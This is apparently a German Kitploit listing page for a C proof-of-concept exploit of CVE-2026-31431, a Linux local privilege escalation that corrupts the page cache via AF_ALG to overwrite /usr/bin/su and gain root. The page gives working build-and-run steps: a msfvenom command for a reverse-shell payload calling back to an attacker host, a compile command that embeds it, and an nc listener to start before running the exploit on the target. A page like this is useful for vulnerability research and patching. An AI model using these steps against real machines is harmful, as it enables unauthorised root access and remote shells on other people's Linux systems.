Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-31431 — C PoC für CVE-2026-31431, eine LPE ohne Privilegien unter Linux, die eine AF_ALG-Page-Cache-Korruption ausnutzt, um /usr/bin/su zu überschreiben und Root-Rechte zu erlangen. | Kitploit
Tools/GitHubGitHub/mcub3/cve-2026-31431
Privilege EscalationExploit-FrameworksSchwachstellenanalyseExploitationPayload-EntwicklungBinary-Exploitation
GitHubmcub3/cve-2026-31431

CVE-2026-31431

C PoC für CVE-2026-31431, eine LPE ohne Privilegien unter Linux, die eine AF_ALG-Page-Cache-Korruption ausnutzt, um /usr/bin/su zu überschreiben und Root-Rechte zu erlangen.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-31431 (Copy Fail) — C-PoC

Trivialer LPE ohne Privilegien durch Schreiben von 4 kontrollierten Bytes in den Page-Cache einer beliebigen lesbaren Datei über einen Logikfehler in AF_ALG (Kernel 4.14 → Anfang 2026).

Korruptiere /usr/bin/su im Speicher und führe es dann aus → Root.

Exploit-Screenshot

Build & Ausführung

root@kitploit:~
# 1. ELF-Payload erzeugen (Reverse-Shell-Beispiel)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
    PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86

# 2. Kompilieren (statisch, gestrippt, Payload via .incbin eingebettet)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c

# 3. Zuerst Listener starten (nc -lvp <LPORT>), dann Exploit auf Zielhost ausführen
./copy_fail_x86

Wichtige Details

• CVE: CVE-2026-31431 • CVSS: 7.8 • Fix: Commit a664bf3d603d

• Funktioniert auf praktisch allen Linux-Distributionen 2017–2026 (inklusive Container).

• Technik: Öffnet /usr/bin/su O_RDONLY, missbraucht AEAD-In-Place-Entschlüsselung, um einen maßgeschneiderten Payload direkt in den Page-Cache zu splicesen und dabei das VFS zu umgehen.

• Ursprüngliche Offenlegung & 732-Byte-Python-PoC → https://copy.fail

Lizenz

MIT – siehe LICENSE. Nur für Bildungszwecke / autorisierte Tests. Nutzung auf eigene Gefahr.

Tool herunterladen